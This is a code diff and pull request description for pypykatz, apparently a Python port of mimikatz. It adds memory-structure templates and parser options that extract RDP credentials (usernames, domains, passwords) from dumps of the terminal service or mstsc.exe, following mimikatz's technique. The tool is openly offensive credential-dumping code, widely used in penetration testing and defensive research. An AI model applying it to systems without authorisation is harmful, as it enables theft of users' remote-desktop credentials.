 
 		if sysinfo.buildnumber >= WindowsBuild.WIN_8.value:
@@ -24,9 +29,53 @@ class RDPCredsTemplate:
 			template.offset = 16
 			template.cred_struct = WTS_KIWI_2008R2
 		
-
 		return template
 
+	@staticmethod
+	def get_mstsc_template():
+		template = RDPCredsTemplate()
+
+		template.signature = b'\xcd\xab\xca\xdb\x03'
+		template.property_struct = TS_PROPERTY_KIWI
+		template.properties_struct = TS_PROPERTIES_KIWI
+		
+		return template
+
+# See mimikatz/modules/kuhl_m_ts.h
+class PTS_PROPERTY_KIWI(POINTER):
+	def __init__(self, reader):
+		super().__init__(reader, TS_PROPERTY_KIWI)
+
+class TS_PROPERTY_KIWI:
+	def __init__(self, reader):
+		reader.align()
+		self.szProperty = PCWSTR(reader).value
+		self.dwType = DWORD(reader).value
+		reader.align()
+		self.pvData = PVOID(reader).value
+		self.unkp0 = PVOID(reader).value
+		self.unkd0 = DWORD(reader).value
+		self.dwFlags = DWORD(reader).value
+		self.unkd1 = DWORD(reader).value
+		self.unkd2 = DWORD(reader).value
+		self.pValidator = PVOID(reader).value
+		self.unkp2 = PVOID(reader).value
+		self.unkp3 = PVOID(reader).value
+
+class TS_PROPERTIES_KIWI:
+	def __init__(self, reader):
+		#self.unkp0 = PVOID(reader).value
+		#self.unkp1 = PVOID(reader).value 
+		self.unkh0 = DWORD(reader).value # 0xdbcaabcd
+		self.unkd0 = DWORD(reader).value # 3
+		self.unkp2 = PVOID(reader).value
+		self.unkd1 = DWORD(reader).value # 45
+		reader.align()
+		self.unkp3 = PVOID(reader).value
+		reader.align()
+		self.pProperties_addr = reader.tell()
+		self.pProperties = PVOID(reader)#PTS_PROPERTY_KIWI(reader)
+		self.cbProperties = DWORD(reader).value
 
 class WTS_KIWI:
 	def __init__(self, reader):
@@ -44,8 +93,8 @@ class WTS_KIWI:
 class WTS_KIWI_2008R2:
 	def __init__(self, reader):
 		self.unk0 = DWORD(reader)
-		self.unk0 = DWORD(reader)
-		self.cbDomain = WORD(reader).value + 511 #making it compatible with the pother version. this is probably a bool?)
+		self.unk1 = DWORD(reader)
+		self.cbDomain = WORD(reader).value + 511 #making it compatible with the other version. this is probably a bool?
 		self.cbUsername = WORD(reader).value + 511
 		self.cbPassword = WORD(reader).value + 511
 		self.unk2 = DWORD(reader)

--- a/pypykatz/rdp/parser.py
+++ b/pypykatz/rdp/parser.py
@@ -7,12 +7,15 @@ from pypykatz.rdp.packages.creds.templates import RDPCredsTemplate
 from pypykatz.rdp.packages.creds.decryptor import RDPCredentialDecryptorLogonpasswords, RDPCredentialDecryptorMstsc
 
 class RDPCredParser:
-	def __init__(self, process, reader, sysinfo, rdp_module):
+	def __init__(self, process, reader, sysinfo, rdp_module, find_first=False, lower_bound=0, upper_bound=-1):
 		self.process = process
 		self.reader = reader
 		self.sysinfo = sysinfo
 		self.credentials = []
 		self.rdp_module = rdp_module
+		self.find_first = find_first
+		self.lower_bound = lower_bound
+		self.upper_bound = upper_bound
 	
 	@staticmethod
 	def go_live(pid = None, all_rdp = False, live_rdp_module = None):
@@ -103,10 +106,10 @@ class RDPCredParser:
 	def rdpcreds(self):
 		if self.rdp_module == "logonpasswords":
 			decryptor_template = RDPCredsTemplate.get_logonpasswords_template(self.sysinfo)
-			decryptor = RDPCredentialDecryptorLogonpasswords(self.process, self.reader, decryptor_template, self.sysinfo)
+			decryptor = RDPCredentialDecryptorLogonpasswords(self.process, self.reader, decryptor_template, self.sysinfo, find_first=self.find_first, lower_bound=self.lower_bound, upper_bound=self.upper_bound)
 		else: # mstsc
 			decryptor_template = RDPCredsTemplate.get_mstsc_template()
-			decryptor = RDPCredentialDecryptorMstsc(self.process, self.reader, decryptor_template, self.sysinfo)
+			decryptor = RDPCredentialDecryptorMstsc(self.process, self.reader, decryptor_template, self.sysinfo, find_first=self.find_first)
 
 		decryptor.start()
 


### PR DESCRIPTION
Hi @skelsec, 

This PR updates the RDP module.

It allows the extraction of RDP connection information through 2 methods:

- `pypykatz rdp logonpasswords -h`: this option extracts RDP credentials information from a memory dump of the terminal service. The code is the same as the previous RDP module, only a few more checks were added to improve accuracy (taken from [mimikatz](https://github.com/gentilkiwi/mimikatz/blob/master/mimikatz/modules/kuhl_m_ts.c) source code).

- `pypykatz rdp mstsc -h`: this option extracts RDP credentials information from a memory dump of the process mstsc.exe, created when a user opens the remote desktop connection application. The extraction method used is the one implemented by  @gentilkiwi and detailed in [mimikatz](https://github.com/gentilkiwi/mimikatz/blob/master/mimikatz/modules/kuhl_m_ts.c).

In order to work properly, you need to apply the pull request [#21](https://github.com/skelsec/minidump/pull/21).
It makes a minor fix in the minidump library, more precisely in the function which is looking for patterns in memory segments.

I did some tests and everything seems to work like a charm on win2012r2, win2016, win2019 and win10 (x64). Further testing is welcome :)

Kind regards